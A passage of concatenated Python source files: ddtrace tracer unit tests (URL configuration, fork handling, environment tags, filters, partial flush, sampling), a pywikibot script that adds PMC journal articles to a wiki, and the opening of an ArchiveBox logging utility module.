with self.start_span("child", child_of=root.context) as child:
pass
self.assertIsNone(root.get_tag("language"))
self.assertIsNone(child.get_tag("language"))
def test_only_root_span_runtime_internal_span_types(self):
self.tracer.configure(collect_metrics=True)
for span_type in ("custom", "template", "web", "worker"):
with self.start_span("root", span_type=span_type) as root:
with self.start_span("child", child_of=root) as child:
pass
assert root.get_tag("language") == "python"
assert child.get_tag("language") is None
def test_only_root_span_runtime_external_span_types(self):
self.tracer.configure(collect_metrics=True)
for span_type in (
"algoliasearch.search",
"boto",
"cache",
"cassandra",
"elasticsearch",
"grpc",
"kombu",
"http",
"memcached",
"redis",
"sql",
"vertica",
):
with self.start_span("root", span_type=span_type) as root:
with self.start_span("child", child_of=root) as child:
pass
assert root.get_tag("language") is None
assert child.get_tag("language") is None
def test_tracer_url():
t = ddtrace.Tracer()
assert t.writer.agent_url == "http://localhost:8126"
t = ddtrace.Tracer(url="http://foobar:12")
assert t.writer.agent_url == "http://foobar:12"
t = ddtrace.Tracer(url="unix:///foobar")
assert t.writer.agent_url == "unix:///foobar"
t = ddtrace.Tracer(url="http://localhost")
assert t.writer.agent_url == "http://localhost:80"
t = ddtrace.Tracer(url="https://localhost")
assert t.writer.agent_url == "https://localhost:443"
with pytest.raises(ValueError) as e:
ddtrace.Tracer(url="foo://foobar:12")
assert str(e) == "Unknown scheme `https` for agent URL"
def test_tracer_shutdown_no_timeout():
t = ddtrace.Tracer()
t.writer = mock.Mock(wraps=t.writer)
# The writer thread does not start until the first write.
t.shutdown()
assert t.writer.stop.called
assert not t.writer.join.called
# Do a write to start the writer.
with t.trace("something"):
pass
assert t.writer.is_alive()
t.shutdown()
t.writer.stop.assert_has_calls(
[
mock.call(timeout=None),
mock.call(timeout=None),
]
)
def test_tracer_configure_writer_stop_unstarted():
t = ddtrace.Tracer()
t.writer = mock.Mock(wraps=t.writer)
orig_writer = t.writer
# Stop should be called when replacing the writer.
t.configure(hostname="localhost", port=8126)
assert orig_writer.stop.called
def test_tracer_configure_writer_stop_started():
t = ddtrace.Tracer()
t.writer = mock.Mock(wraps=t.writer)
orig_writer = t.writer
# Do a write to start the writer
with t.trace("something"):
pass
t.configure(hostname="localhost", port=8126)
orig_writer.stop.assert_called_once_with()
def test_tracer_shutdown_timeout():
t = ddtrace.Tracer()
t.writer = mock.Mock(wraps=t.writer)
with t.trace("something"):
pass
t.shutdown(timeout=2)
t.writer.stop.assert_called_once_with(timeout=2)
def test_tracer_dogstatsd_url():
t = ddtrace.Tracer()
assert t.writer.dogstatsd.host == "localhost"
assert t.writer.dogstatsd.port == 8125
t = ddtrace.Tracer(dogstatsd_url="foobar:12")
assert t.writer.dogstatsd.host == "foobar"
assert t.writer.dogstatsd.port == 12
t = ddtrace.Tracer(dogstatsd_url="udp://foobar:12")
assert t.writer.dogstatsd.host == "foobar"
assert t.writer.dogstatsd.port == 12
t = ddtrace.Tracer(dogstatsd_url="/var/run/statsd.sock")
assert t.writer.dogstatsd.socket_path == "/var/run/statsd.sock"
t = ddtrace.Tracer(dogstatsd_url="unix:///var/run/statsd.sock")
assert t.writer.dogstatsd.socket_path == "/var/run/statsd.sock"
with pytest.raises(ValueError) as e:
t = ddtrace.Tracer(dogstatsd_url="foo://foobar:12")
assert str(e) == "Unknown url format for `foo://foobar:12`"
def test_tracer_fork():
t = ddtrace.Tracer()
original_pid = t._pid
original_writer = t.writer
@contextlib.contextmanager
def capture_failures(errors):
try:
yield
except AssertionError as e:
errors.put(e)
def task(t, errors):
# Start a new span to trigger process checking
with t.trace("test", service="test"):
# Assert we recreated the writer and have a new queue
with capture_failures(errors):
assert t._pid != original_pid
assert t.writer != original_writer
assert t.writer._buffer != original_writer._buffer
# Assert the trace got written into the correct queue
assert len(original_writer._buffer) == 0
assert len(t.writer._buffer) == 1
# Assert tracer in a new process correctly recreates the writer
errors = multiprocessing.Queue()
p = multiprocessing.Process(target=task, args=(t, errors))
try:
p.start()
finally:
p.join(timeout=2)
assert errors.empty(), errors.get()
# Ensure writing into the tracer in this process still works as expected
with t.trace("test", service="test"):
assert t._pid == original_pid
assert t.writer == original_writer
assert t.writer._buffer == original_writer._buffer
# Assert the trace got written into the correct queue
assert len(original_writer._buffer) == 1
assert len(t.writer._buffer) == 1
def test_tracer_trace_across_fork():
"""
When a trace is started in a parent process and a child process is spawned
The trace should be continued in the child process
"""
tracer = Tracer()
tracer.writer = DummyWriter()
def task(tracer, q):
tracer.writer = DummyWriter()
with tracer.trace("child"):
pass
spans = tracer.writer.pop()
q.put([dict(trace_id=s.trace_id, parent_id=s.parent_id) for s in spans])
# Assert tracer in a new process correctly recreates the writer
q = multiprocessing.Queue()
with tracer.trace("parent") as parent:
p = multiprocessing.Process(target=task, args=(tracer, q))
p.start()
p.join()
children = q.get()
assert len(children) == 1
(child,) = children
assert parent.trace_id == child["trace_id"]
assert child["parent_id"] == parent.span_id
def test_tracer_trace_across_multiple_forks():
"""
When a trace is started and crosses multiple process boundaries
The trace should be continued in the child processes
"""
tracer = ddtrace.Tracer()
tracer.writer = DummyWriter()
# Start a span in this process then start a child process which itself
# starts a span and spawns another child process which starts a span.
def task(tracer, q):
tracer.writer = DummyWriter()
def task2(tracer, q):
tracer.writer = DummyWriter()
with tracer.trace("child2"):
pass
spans = tracer.writer.pop()
q.put([dict(trace_id=s.trace_id, parent_id=s.parent_id) for s in spans])
with tracer.trace("child1"):
q2 = multiprocessing.Queue()
p = multiprocessing.Process(target=task2, args=(tracer, q2))
p.start()
p.join()
task2_spans = q2.get()
spans = tracer.writer.pop()
q.put([dict(trace_id=s.trace_id, parent_id=s.parent_id, span_id=s.span_id) for s in spans] + task2_spans)
# Assert tracer in a new process correctly recreates the writer
q = multiprocessing.Queue()
with tracer.trace("parent") as parent:
p = multiprocessing.Process(target=task, args=(tracer, q))
p.start()
p.join()
children = q.get()
assert len(children) == 2
child1, child2 = children
assert parent.trace_id == child1["trace_id"] == child2["trace_id"]
assert child1["parent_id"] == parent.span_id
assert child2["parent_id"] == child1["span_id"]
def test_tracer_with_version():
t = ddtrace.Tracer()
# With global `config.version` defined
with override_global_config(dict(version="1.2.3")):
with t.trace("test.span") as span:
assert span.get_tag(VERSION_KEY) == "1.2.3"
# override manually
span.set_tag(VERSION_KEY, "4.5.6")
assert span.get_tag(VERSION_KEY) == "4.5.6"
# With no `config.version` defined
with t.trace("test.span") as span:
assert span.get_tag(VERSION_KEY) is None
# explicitly set in the span
span.set_tag(VERSION_KEY, "1.2.3")
assert span.get_tag(VERSION_KEY) == "1.2.3"
# With global tags set
t.set_tags({VERSION_KEY: "tags.version"})
with override_global_config(dict(version="config.version")):
with t.trace("test.span") as span:
assert span.get_tag(VERSION_KEY) == "config.version"
def test_tracer_with_env():
t = ddtrace.Tracer()
# With global `config.env` defined
with override_global_config(dict(env="prod")):
with t.trace("test.span") as span:
assert span.get_tag(ENV_KEY) == "prod"
# override manually
span.set_tag(ENV_KEY, "prod-staging")
assert span.get_tag(ENV_KEY) == "prod-staging"
# With no `config.env` defined
with t.trace("test.span") as span:
assert span.get_tag(ENV_KEY) is None
# explicitly set in the span
span.set_tag(ENV_KEY, "prod-staging")
assert span.get_tag(ENV_KEY) == "prod-staging"
# With global tags set
t.set_tags({ENV_KEY: "tags.env"})
with override_global_config(dict(env="config.env")):
with t.trace("test.span") as span:
assert span.get_tag(ENV_KEY) == "config.env"
class EnvTracerTestCase(TracerTestCase):
"""Tracer test cases requiring environment variables."""
@run_in_subprocess(env_overrides=dict(DATADOG_SERVICE_NAME="mysvc"))
def test_service_name_legacy_DATADOG_SERVICE_NAME(self):
"""
When DATADOG_SERVICE_NAME is provided
It should not be used by default
It should be used with config._get_service()
"""
from ddtrace import config
assert config.service is None
with self.start_span("") as s:
s.assert_matches(service=None)
with self.start_span("", service=config._get_service()) as s:
s.assert_matches(service="mysvc")
@run_in_subprocess(env_overrides=dict(DD_SERVICE_NAME="mysvc"))
def test_service_name_legacy_DD_SERVICE_NAME(self):
"""
When DD_SERVICE_NAME is provided
It should not be used by default
It should be used with config._get_service()
"""
from ddtrace import config
assert config.service is None
with self.start_span("") as s:
s.assert_matches(service=None)
with self.start_span("", service=config._get_service()) as s:
s.assert_matches(service="mysvc")
@run_in_subprocess(env_overrides=dict(DD_SERVICE="mysvc"))
def test_service_name_env(self):
with self.start_span("") as span:
pass
span.assert_matches(
service="mysvc",
)
@run_in_subprocess(env_overrides=dict(DD_SERVICE="mysvc"))
def test_service_name_env_global_config(self):
# Global config should have higher precedence than the environment variable
with self.override_global_config(dict(service="overridesvc")):
with self.start_span("") as span:
pass
span.assert_matches(
service="overridesvc",
)
@run_in_subprocess(env_overrides=dict(DD_VERSION="0.1.2"))
def test_version_no_global_service(self):
# Version should be set if no service name is present
with self.trace("") as span:
span.assert_matches(
meta={
VERSION_KEY: "0.1.2",
},
)
# The version will not be tagged if the service is not globally
# configured.
with self.trace("root", service="rootsvc") as root:
assert VERSION_KEY not in root.meta
with self.trace("child") as span:
assert VERSION_KEY not in span.meta
@run_in_subprocess(env_overrides=dict(DD_SERVICE="django", DD_VERSION="0.1.2"))
def test_version_service(self):
# Fleshed out example of service and version tagging
# Our app is called django, we provide DD_SERVICE=django and DD_VERSION=0.1.2
with self.trace("django.request") as root:
# Root span should be tagged
assert root.service == "django"
assert VERSION_KEY in root.meta and root.meta[VERSION_KEY] == "0.1.2"
# Child spans should be tagged
with self.trace("") as child1:
assert child1.service == "django"
assert VERSION_KEY in child1.meta and child1.meta[VERSION_KEY] == "0.1.2"
# Version should not be applied to spans of a service that isn't user-defined
with self.trace("mysql.query", service="mysql") as span:
assert VERSION_KEY not in span.meta
# Child should also not have a version
with self.trace("") as child2:
assert child2.service == "mysql"
assert VERSION_KEY not in child2.meta
@run_in_subprocess(env_overrides=dict(AWS_LAMBDA_FUNCTION_NAME="my-func"))
def test_detect_agentless_env(self):
assert isinstance(self.tracer.original_writer, LogWriter)
@run_in_subprocess(env_overrides=dict(AWS_LAMBDA_FUNCTION_NAME="my-func", DD_AGENT_HOST="localhost"))
def test_detect_agent_config(self):
assert isinstance(self.tracer.original_writer, AgentWriter)
@run_in_subprocess(env_overrides=dict(DD_TAGS="key1:value1,key2:value2"))
def test_dd_tags(self):
assert self.tracer.tags["key1"] == "value1"
assert self.tracer.tags["key2"] == "value2"
@run_in_subprocess(env_overrides=dict(DD_TAGS="key1:value1,key2:value2,key3"))
def test_dd_tags_invalid(self):
assert "key1" in self.tracer.tags
assert "key2" in self.tracer.tags
assert "key3" not in self.tracer.tags
@run_in_subprocess(env_overrides=dict(DD_TAGS="service:mysvc,env:myenv,version:myvers"))
def test_tags_from_DD_TAGS(self):
t = ddtrace.Tracer()
with t.trace("test") as s:
assert s.service == "mysvc"
assert s.get_tag("env") == "myenv"
assert s.get_tag("version") == "myvers"
@run_in_subprocess(
env_overrides=dict(
DD_TAGS="service:s,env:e,version:v",
DD_ENV="env",
DD_SERVICE="svc",
DD_VERSION="0.123",
)
)
def test_tags_from_DD_TAGS_precedence(self):
t = ddtrace.Tracer()
with t.trace("test") as s:
assert s.service == "svc"
assert s.get_tag("env") == "env"
assert s.get_tag("version") == "0.123"
@run_in_subprocess(env_overrides=dict(DD_TAGS="service:mysvc,env:myenv,version:myvers"))
def test_tags_from_DD_TAGS_override(self):
t = ddtrace.Tracer()
ddtrace.config.env = "env"
ddtrace.config.service = "service"
ddtrace.config.version = "0.123"
with t.trace("test") as s:
assert s.service == "service"
assert s.get_tag("env") == "env"
assert s.get_tag("version") == "0.123"
def test_tracer_set_runtime_tags():
t = ddtrace.Tracer()
with t.start_span("foobar") as span:
pass
assert len(span.get_tag("runtime-id"))
t2 = ddtrace.Tracer()
with t2.start_span("foobaz") as span2:
pass
assert span.get_tag("runtime-id") == span2.get_tag("runtime-id")
def test_tracer_runtime_tags_fork():
tracer = ddtrace.Tracer()
def task(tracer, q):
span = tracer.start_span("foobaz")
q.put(span.get_tag("runtime-id"))
span.finish()
span = tracer.start_span("foobar")
span.finish()
q = multiprocessing.Queue()
p = multiprocessing.Process(target=task, args=(tracer, q))
p.start()
p.join()
children_tag = q.get()
assert children_tag != span.get_tag("runtime-id")
def test_start_span_hooks():
t = ddtrace.Tracer()
result = {}
@t.on_start_span
def store_span(span):
result["span"] = span
span = t.start_span("hello")
assert span == result["span"]
span.finish()
def test_deregister_start_span_hooks():
t = ddtrace.Tracer()
result = {}
@t.on_start_span
def store_span(span):
result["span"] = span
t.deregister_on_start_span(store_span)
with t.start_span("hello"):
pass
assert result == {}
def test_enable(monkeypatch):
t1 = ddtrace.Tracer()
assert t1.enabled
monkeypatch.setenv("DD_TRACE_ENABLED", "false")
t2 = ddtrace.Tracer()
assert not t2.enabled
def test_runtime_id_parent_only():
tracer = ddtrace.Tracer()
# Parent spans should have runtime-id
s = tracer.trace("test")
rtid = s.get_tag("runtime-id")
assert isinstance(rtid, six.string_types)
# Child spans should not
s2 = tracer.trace("test2")
assert s2.get_tag("runtime-id") is None
s2.finish()
s.finish()
# Parent spans should have runtime-id
s = tracer.trace("test")
s.finish()
rtid = s.get_tag("runtime-id")
assert isinstance(rtid, six.string_types)
def test_runtime_id_fork():
tracer = ddtrace.Tracer()
s = tracer.trace("test")
s.finish()
rtid = s.get_tag("runtime-id")
assert isinstance(rtid, six.string_types)
pid = os.fork()
if pid == 0:
# child
s = tracer.trace("test")
s.finish()
rtid_child = s.get_tag("runtime-id")
assert isinstance(rtid_child, six.string_types)
assert rtid != rtid_child
os._exit(12)
_, status = os.waitpid(pid, 0)
exit_code = os.WEXITSTATUS(status)
assert exit_code == 12
def test_multiple_tracer_ctx():
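    # Two separate Tracer instances share the same thread-local context, so a
    # span started on t2 while t1's span is active becomes its child.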
t1 = ddtrace.Tracer()
t2 = ddtrace.Tracer()
with t1.trace("") as s1:
with t2.trace("") as s2:
pass
assert s2.parent_id == s1.span_id
assert s2.trace_id == s1.trace_id
def test_filters(tracer, test_spans):
class FilterAll(object):
def process_trace(self, trace):
return None
tracer.configure(
settings={
"FILTERS": [FilterAll()],
}
)
with tracer.trace("root"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
assert len(spans) == 0
class FilterMutate(object):
def __init__(self, key, value):
self.key = key
self.value = value
def process_trace(self, trace):
for s in trace:
s.set_tag(self.key, self.value)
return trace
tracer.configure(
settings={
"FILTERS": [FilterMutate("boop", "beep")],
}
)
with tracer.trace("root"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
assert len(spans) == 2
s1, s2 = spans
assert s1.get_tag("boop") == "beep"
assert s2.get_tag("boop") == "beep"
# Test multiple filters
tracer.configure(
settings={
"FILTERS": [FilterMutate("boop", "beep"), FilterMutate("mats", "sundin")],
}
)
with tracer.trace("root"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
assert len(spans) == 2
for s in spans:
assert s.get_tag("boop") == "beep"
assert s.get_tag("mats") == "sundin"
class FilterBroken(object):
def process_trace(self, trace):
_ = 1 / 0
tracer.configure(
settings={
"FILTERS": [FilterBroken()],
}
)
with tracer.trace("root"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
assert len(spans) == 2
tracer.configure(
settings={
"FILTERS": [FilterMutate("boop", "beep"), FilterBroken()],
}
)
with tracer.trace("root"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
assert len(spans) == 2
for s in spans:
assert s.get_tag("boop") == "beep"
def test_early_exit(tracer, test_spans):
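    # Finishing the parent (s1) before its still-open child (s2) should not
    # break trace assembly: both spans are still flushed as a single trace.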
s1 = tracer.trace("1")
s2 = tracer.trace("2")
s1.finish()
s2.finish()
assert s1.parent_id is None
assert s2.parent_id is s1.span_id
traces = test_spans.pop_traces()
assert len(traces) == 1
assert len(traces[0]) == 2
s1 = tracer.trace("1-1")
s1.finish()
assert s1.parent_id is None
s1 = tracer.trace("1-2")
s1.finish()
assert s1.parent_id is None
class TestPartialFlush(TracerTestCase):
@TracerTestCase.run_in_subprocess(
env_overrides=dict(DD_TRACER_PARTIAL_FLUSH_ENABLED="true", DD_TRACER_PARTIAL_FLUSH_MIN_SPANS="5")
)
def test_partial_flush(self):
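        # With partial flushing enabled and a 5-span threshold, the five finished
        # children are flushed as their own batch before the root span finishes.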
root = self.tracer.trace("root")
for i in range(5):
self.tracer.trace("child%s" % i).finish()
traces = self.pop_traces()
assert len(traces) == 1
assert len(traces[0]) == 5
assert [s.name for s in traces[0]] == ["child0", "child1", "child2", "child3", "child4"]
root.finish()
traces = self.pop_traces()
assert len(traces) == 1
assert len(traces[0]) == 1
assert traces[0][0].name == "root"
@TracerTestCase.run_in_subprocess(
env_overrides=dict(DD_TRACER_PARTIAL_FLUSH_ENABLED="true", DD_TRACER_PARTIAL_FLUSH_MIN_SPANS="1")
)
def test_partial_flush_too_many(self):
root = self.tracer.trace("root")
for i in range(5):
self.tracer.trace("child%s" % i).finish()
traces = self.pop_traces()
assert len(traces) == 5
for t in traces:
assert len(t) == 1
assert [t[0].name for t in traces] == ["child0", "child1", "child2", "child3", "child4"]
root.finish()
traces = self.pop_traces()
assert len(traces) == 1
assert traces[0][0].name == "root"
@TracerTestCase.run_in_subprocess(
env_overrides=dict(DD_TRACER_PARTIAL_FLUSH_ENABLED="true", DD_TRACER_PARTIAL_FLUSH_MIN_SPANS="6")
)
def test_partial_flush_too_few(self):
root = self.tracer.trace("root")
for i in range(5):
self.tracer.trace("child%s" % i).finish()
traces = self.pop_traces()
assert len(traces) == 0
root.finish()
traces = self.pop_traces()
assert len(traces) == 1
assert [s.name for s in traces[0]] == ["root", "child0", "child1", "child2", "child3", "child4"]
def test_unicode_config_vals():
t = ddtrace.Tracer()
with override_global_config(dict(version=u"😇", env=u"😇")):
with t.trace("1"):
pass
t.shutdown()
def test_ctx(tracer, test_spans):
with tracer.trace("test") as s1:
assert tracer.current_span() == s1
assert tracer.current_root_span() == s1
assert tracer.get_call_context().trace_id == s1.trace_id
assert tracer.get_call_context().span_id == s1.span_id
with tracer.trace("test2") as s2:
assert tracer.current_span() == s2
assert tracer.current_root_span() == s1
assert tracer.get_call_context().trace_id == s1.trace_id
assert tracer.get_call_context().span_id == s2.span_id
with tracer.trace("test3") as s3:
assert tracer.current_span() == s3
assert tracer.current_root_span() == s1
assert tracer.get_call_context().trace_id == s1.trace_id
assert tracer.get_call_context().span_id == s3.span_id
assert tracer.get_call_context().trace_id == s1.trace_id
assert tracer.get_call_context().span_id == s2.span_id
with tracer.trace("test4") as s4:
assert tracer.current_span() == s4
assert tracer.current_root_span() == s1
assert tracer.get_call_context().trace_id == s1.trace_id
assert tracer.get_call_context().span_id == s4.span_id
assert tracer.current_span() == s1
assert tracer.current_root_span() == s1
assert tracer.current_span() is None
assert tracer.current_root_span() is None
assert s1.parent_id is None
assert s2.parent_id == s1.span_id
assert s3.parent_id == s2.span_id
assert s4.parent_id == s1.span_id
assert s1.trace_id == s2.trace_id == s3.trace_id == s4.trace_id
assert s1.metrics[SAMPLING_PRIORITY_KEY] == 1
assert SAMPLING_PRIORITY_KEY not in s2.metrics
assert ORIGIN_KEY not in s1.meta
t = test_spans.pop_traces()
assert len(t) == 1
assert len(t[0]) == 4
_s1, _s2, _s3, _s4 = t[0]
assert s1 == _s1
assert s2 == _s2
assert s3 == _s3
assert s4 == _s4
with tracer.trace("s") as s:
assert s.parent_id is None
assert s.trace_id != s1.trace_id
def test_multithreaded(tracer, test_spans):
def target():
with tracer.trace("s1"):
with tracer.trace("s2"):
pass
with tracer.trace("s3"):
pass
for i in range(1000):
ts = [threading.Thread(target=target) for _ in range(10)]
for t in ts:
t.start()
for t in ts:
t.join()
traces = test_spans.pop_traces()
assert len(traces) == 10
for trace in traces:
assert len(trace) == 3
def test_ctx_distributed(tracer, test_spans):
# Test activating an invalid context.
ctx = Context(span_id=None, trace_id=None)
tracer.context_provider.activate(ctx)
assert tracer.current_span() is None
with tracer.trace("test") as s1:
assert tracer.current_span() == s1
assert tracer.current_root_span() == s1
assert tracer.get_call_context().trace_id == s1.trace_id
assert tracer.get_call_context().span_id == s1.span_id
assert s1.parent_id is None
trace = test_spans.pop_traces()
assert len(trace) == 1
# Test activating a valid context.
ctx = Context(span_id=1234, trace_id=4321, sampling_priority=2, dd_origin="somewhere")
tracer.context_provider.activate(ctx)
assert tracer.current_span() is None
with tracer.trace("test2") as s2:
assert tracer.current_span() == s2
assert tracer.current_root_span() == s2
assert tracer.get_call_context().trace_id == s2.trace_id == 4321
assert tracer.get_call_context().span_id == s2.span_id
assert s2.parent_id == 1234
trace = test_spans.pop_traces()
assert len(trace) == 1
assert s2.metrics[SAMPLING_PRIORITY_KEY] == 2
assert s2.meta[ORIGIN_KEY] == "somewhere"
def test_manual_keep(tracer, test_spans):
# On a root span
with tracer.trace("asdf") as s:
s.set_tag(MANUAL_KEEP_KEY)
spans = test_spans.pop()
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] is priority.USER_KEEP
# On a child span
with tracer.trace("asdf"):
with tracer.trace("child") as s:
s.set_tag(MANUAL_KEEP_KEY)
spans = test_spans.pop()
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] is priority.USER_KEEP
def test_manual_keep_then_drop(tracer, test_spans):
# Test changing the value before finish.
with tracer.trace("asdf") as root:
with tracer.trace("child") as child:
child.set_tag(MANUAL_KEEP_KEY)
root.set_tag(MANUAL_DROP_KEY)
spans = test_spans.pop()
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] is priority.USER_REJECT
def test_manual_drop(tracer, test_spans):
# On a root span
with tracer.trace("asdf") as s:
s.set_tag(MANUAL_DROP_KEY)
spans = test_spans.pop()
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] is priority.USER_REJECT
# On a child span
with tracer.trace("asdf"):
with tracer.trace("child") as s:
s.set_tag(MANUAL_DROP_KEY)
spans = test_spans.pop()
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] is priority.USER_REJECT
@mock.patch("ddtrace.internal.hostname.get_hostname")
def test_get_report_hostname_enabled(get_hostname, tracer, test_spans):
get_hostname.return_value = "test-hostname"
with override_global_config(dict(report_hostname=True)):
with tracer.trace("span"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
root = spans[0]
child = spans[1]
assert root.get_tag(HOSTNAME_KEY) == "test-hostname"
assert child.get_tag(HOSTNAME_KEY) is None
@mock.patch("ddtrace.internal.hostname.get_hostname")
def test_get_report_hostname_disabled(get_hostname, tracer, test_spans):
get_hostname.return_value = "test-hostname"
with override_global_config(dict(report_hostname=False)):
with tracer.trace("span"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
root = spans[0]
child = spans[1]
assert root.get_tag(HOSTNAME_KEY) is None
assert child.get_tag(HOSTNAME_KEY) is None
@mock.patch("ddtrace.internal.hostname.get_hostname")
def test_get_report_hostname_default(get_hostname, tracer, test_spans):
get_hostname.return_value = "test-hostname"
with override_global_config(dict(report_hostname=False)):
with tracer.trace("span"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
root = spans[0]
child = spans[1]
assert root.get_tag(HOSTNAME_KEY) is None
assert child.get_tag(HOSTNAME_KEY) is None
def test_service_mapping():
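    # DD_SERVICE_MAPPING remaps service names on emitted spans using "from:to"
    # pairs; the helper below rebuilds config.service_mapping from the overridden
    # environment and restores the empty mapping afterwards.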
@contextlib.contextmanager
def override_service_mapping(service_mapping):
with override_env(dict(DD_SERVICE_MAPPING=service_mapping)):
assert ddtrace.config.service_mapping == {}
ddtrace.config.service_mapping = Config().service_mapping
yield
ddtrace.config.service_mapping = {}
# Test single mapping
with override_service_mapping("foo:bar"), ddtrace.Tracer().trace("renaming", service="foo") as span:
assert span.service == "bar"
# Test multiple mappings
with override_service_mapping("foo:bar,sna:fu"), ddtrace.Tracer().trace("renaming", service="sna") as span:
assert span.service == "fu"
# Test colliding mappings
with override_service_mapping("foo:bar,foo:foobar"), ddtrace.Tracer().trace("renaming", service="foo") as span:
assert span.service == "foobar"
# Test invalid service mapping
with override_service_mapping("foo;bar,sna:fu"):
with ddtrace.Tracer().trace("passthru", service="foo") as _:
assert _.service == "foo"
with ddtrace.Tracer().trace("renaming", "sna") as _:
assert _.service == "fu"
def test_configure_url_partial():
tracer = ddtrace.Tracer()
tracer.configure(hostname="abc")
assert tracer.writer.agent_url == "http://abc:8126"
tracer.configure(port=123)
assert tracer.writer.agent_url == "http://abc:123"
tracer = ddtrace.Tracer(url="http://abc")
assert tracer.writer.agent_url == "http://abc:80"
tracer.configure(port=123)
assert tracer.writer.agent_url == "http://abc:123"
tracer.configure(port=431)
assert tracer.writer.agent_url == "http://abc:431"
|
addpapers.py
|
import queryCiteFile
import librarybase
import pywikibot
from epmclib.getPMCID import getPMCID
from epmclib.exceptions import IDNotResolvedException
import queue
import threading
import time
def rununthreaded():
citefile = queryCiteFile.CiteFile()
citations = citefile.findRowsWithIDType('pmc')
for idx, citation in enumerate(citations[10513:]):
addpaper(idx, citation)
def runthreaded():
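    # Producer/consumer sketch: ten worker threads pull (idx, citation) tuples
    # from the module-level queue `q`; after every citation has been enqueued
    # and processed, one None sentinel per worker tells each thread to exit.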
threads = []
for i in range(10):
        t = threading.Thread(target=worker)
t.start()
threads.append(t)
citefile = queryCiteFile.CiteFile()
citations = citefile.findRowsWithIDType('pmc')
for citation in enumerate(citations[10513:]):
q.put(citation)
q.join()
for i in range(10):
q.put(None)
for t in threads:
t.join()
def worker():
    while True:
        item = q.get()
        if item is None:  # sentinel from runthreaded(): no more work
            q.task_done()
            break
        idx, citation = item
        addpaper(idx, citation)
        q.task_done()
def addpaper( idx, citation ):
start=time.time()
print(citation)
if citation is None:
return
print('trying to add {} number {}'.format(citation[5], idx))
site = pywikibot.Site("librarybase", "librarybase")
item = librarybase.JournalArticlePage(site)
pmcidobj = getPMCID(citation[5])
try:
pmcidobj.getBBasicMetadata()
except IDNotResolvedException:
print('Couldn\'t find in EPMC:' + citation[5])
return
metadata = pmcidobj.metadata
print("Got metadata in:" + str(time.time()-start))
if not item.articleAlreadyExists(metadata['pmcid']):
print('Item doesn\'t seem to exist. Setting metadata for: ' + metadata['pmcid'])
item.setMetaData(metadata)
print("set metadata in" + str(time.time()-start))
else:
print("{} already exists. Doing nothing".format(metadata['pmcid']))
q = queue.Queue()
rununthreaded()
|
logging_util.py
|
__package__ = 'archivebox'
import re
import os
import sys
import stat
import time
import argparse
from math import log
from multiprocessing import Process
from pathlib import Path
from datetime import datetime, timezone
from dataclasses import dataclass
from typing import Any, Optional, List, Dict, Union, IO, TYPE_CHECKING
if TYPE_CHECKING:
from .index.schema import Link, ArchiveResult
from .system import get_dir_size
from .util import enforce_types
from .config import (
ConfigDict,
OUTPUT_DIR,
PYTHON_ENCODING,
VERSION,
ANSI,
IS_TTY,
IN_DOCKER,
TERM_WIDTH,
SHOW_PROGRESS,
SOURCES_DIR_NAME,
stderr,
)
@dataclass
class RuntimeStats:
"""mutable stats counter for logging archiving timing info to CLI output"""
skipped: int = 0
succeeded: int = 0
failed: int = 0
parse_start_ts: Optional[datetime] = None
parse_end_ts: Optional[datetime] = None
index_start_ts: Optional[datetime] = None
index_end_ts: Optional[datetime] = None
archiving_start_ts: Optional[datetime] = None
archiving_end_ts: Optional[datetime] = None
# globals are bad, mmkay
_LAST_RUN_STATS = RuntimeStats()
def debug_dict_summary(obj: Dict[Any, Any]) -> None:
stderr(' '.join(f'{key}={str(val).ljust(6)}' for key, val in obj.items()))
def get_fd_info(fd) -> Dict[str, Any]:
NAME = fd.name[1:-1]
FILENO = fd.fileno()
MODE = os.fstat(FILENO).st_mode
IS_TTY = hasattr(fd, 'isatty') and fd.isatty()
IS_PIPE = stat.S_ISFIFO(MODE)
IS_FILE = stat.S_ISREG(MODE)
IS_TERMINAL = not (IS_PIPE or IS_FILE)
IS_LINE_BUFFERED = fd.line_buffering
IS_READABLE = fd.readable()
return {
'NAME': NAME, 'FILENO': FILENO, 'MODE': MODE,
'IS_TTY': IS_TTY, 'IS_PIPE': IS_PIPE, 'IS_FILE': IS_FILE,
'IS_TERMINAL': IS_TERMINAL, 'IS_LINE_BUFFERED': IS_LINE_BUFFERED,
'IS_READABLE': IS_READABLE,
}
# # Log debug information about stdin, stdout, and stderr
# sys.stdout.write('[>&1] this is python stdout\n')
# sys.stderr.write('[>&2] this is python stderr\n')
# debug_dict_summary(get_fd_info(sys.stdin))
# debug_dict_summary(get_fd_info(sys.stdout))
# debug_dict_summary(get_fd_info(sys.stderr))
class SmartFormatter(argparse.HelpFormatter):
"""Patched formatter that prints newlines in argparse help strings"""
def _split_lines(self, text, width):
if '\n' in text:
return text.splitlines()
return argparse.HelpFormatter._split_lines(self, text, width)
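# Typical usage (assumed, not shown in this excerpt):
#   parser = argparse.ArgumentParser(formatter_class=SmartFormatter)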
def reject_stdin(caller: str, stdin: Optional[IO]=sys.stdin) -> None:
"""Tell the user they passed stdin to a command that doesn't accept it"""
if not stdin:
return None
if IN_DOCKER:
        # when TTY is disabled in docker we can't tell if stdin is being piped in or not
        # if we try to read stdin when it's not piped we will hang indefinitely waiting for it
return None
if not stdin.isatty():
# stderr('READING STDIN TO REJECT...')
stdin_raw_text = stdin.read()
if stdin_raw_text.strip():
# stderr('GOT STDIN!', len(stdin_str))
stderr(f'[!] The "{caller}" command does not accept stdin (ignoring).', color='red')
stderr(f' Run archivebox "{caller} --help" to see usage and examples.')
stderr()
# raise SystemExit(1)
return None
def accept_stdin(stdin: Optional[IO]=sys.stdin) -> Optional[str]:
"""accept any standard input and return it as a string or None"""
if not stdin:
return None
if not stdin.isatty():
# stderr('READING STDIN TO ACCEPT...')
stdin_str = stdin.read()
if stdin_str:
# stderr('GOT STDIN...', len(stdin_str))
return stdin_str
return None
class TimedProgress:
"""Show a progress bar and measure elapsed time until .end() is called"""
def __init__(self, seconds, prefix=''):
